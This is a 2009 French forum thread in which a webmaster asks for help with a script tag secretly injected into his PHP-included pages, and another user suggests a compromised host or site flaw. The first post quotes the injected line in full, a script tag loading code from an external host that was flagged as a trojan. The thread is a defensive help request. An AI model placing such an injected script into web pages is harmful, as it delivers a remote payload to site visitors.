CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Liste des sujets

Problème : script ajouté à mon insu !!

dexter_68
dexter_68
Niveau 10
02 décembre 2009 à 18:11:56

:salut: tout le monde ! :)

J'ai un gros problème sur un site internet que j'avais créé.

:d) Un script est ajouté automatiquement sur mes pages sans que je le veuille !! :peur:

Voici le script en question : <script
src=http://habs.diezel.bplaced.net/Assets/menu.php
></script>

ATTENTION, NE CLIQUEZ PAS SUR LE LIEN, je ne sais pas ou il mène (virus ou autre...).

La personne a qui j'ai fait le site m'a dit qu'elle avait reçu un message indiquant que c'était un cheval de troie qui pouvait nuir à l'ordinateur ou agir à son insu... :peur:

Est-ce que vous savez d'où ça pourrait provenir :question: Comment je peux faire pour corriger ça :question:

:d) J'ai des pages en php, sans bases de données, sans requetes ou autres. En fait, ce sont uniquement des pages en HTML mais avec un (include:"menu.php";) afin d'éviter de retaper le menu sur toutes les pages...

:merci: d'avance pour votre aide ! :ok:

deepblue
deepblue
Niveau 16
02 décembre 2009 à 18:39:43

Ton hébergeur est pourri ^^

dexter_68
dexter_68
Niveau 10
02 décembre 2009 à 18:46:18

:salut: deepblue !

Est-ce que ça vient obligatoirement de l'hébergeur ou est-ce que mon site a pu être piraté :question:

Le site est hébergé chez Hosteur.

:d) Est-ce que l'écrire complètement en HTML pourrait arrêter ce problème où ça n'a rien à voir :question:

deepblue
deepblue
Niveau 16
02 décembre 2009 à 18:55:54

Ton hébergeur est infesté. Le virus peut venir d'un site hosté dessus ou d'une attaque ailleurs.

Le seul moyen est que l'hébergeur vire ce virus. Je sais que sur un ftp d'un contact, il y avait un virus qui ajoutait du code aussi, et j'avais développé un script qui toutes les X secondes était lancé, parsait tous les fichiers modifié par le virus (.html, .php, .htm, .js) et qui virait le code ajouté par ce virus.

dexter_68
dexter_68
Niveau 10
02 décembre 2009 à 18:56:55

Aussi, je viens de voir que lorsque je vais sur la page d'accueil [index.php] ou il n'y a pas du tout de code PHP, le script n'est pas ajouté.

Une fois sur les autres pages (ou le include:"menu.php" est ajouté), le script non souhaité est présent dans la page...

:d) Est-ce que ça peut-être dû à mon include qui a été piraté ?? (j'écris toujours en texte include:"menu.php", il n'y a pas de variables qui pourrait être modifiées par un pirate). Enfin, je ne crois pas... :peur:

deepblue
deepblue
Niveau 16
02 décembre 2009 à 20:01:27

ton site est peut-être faillible. Une faille à peu permettre l'ajout d'un fichier qui permet de modifier tes pages à distance ou de façon automatique. C'est en ayant le code sous les yeux qu'on pourra le savoir :ok:

dexter_68
dexter_68
Niveau 10
02 décembre 2009 à 20:18:09

Je n'aime pas trop donner mes codes sur le net (j'ai peur des pirates :peur: )...

Toutes mes pages sont écrites uniquement en HTML. Il y a seulement le menu qui a été ajouté grâce à du PHP : <?php include:"menu.php"?> (En gros, j'ai mis tout mon PHP sur ce forum) :o))

:d) Est-ce qu'un pirate peut ajouter du code ou des fichiers avec une faille Html (s'il en existe) ?

deepblue
deepblue
Niveau 16
02 décembre 2009 à 20:42:00

non

dexter_68
dexter_68
Niveau 10
02 décembre 2009 à 21:14:40

OK merci pour ces réponses ! :)

:d) Je vais donc prendre contact avec l'hébergeur pour qu'il règle ce problème... :ok:

Sous forums
  • Aide à l'achat Mac
  • Macintosh
  • Création de sites web
  • Création de Jeux
  • Linux
  • Programmation
  • Internet
  • Steam Deck
  • Hardware
La vidéo du moment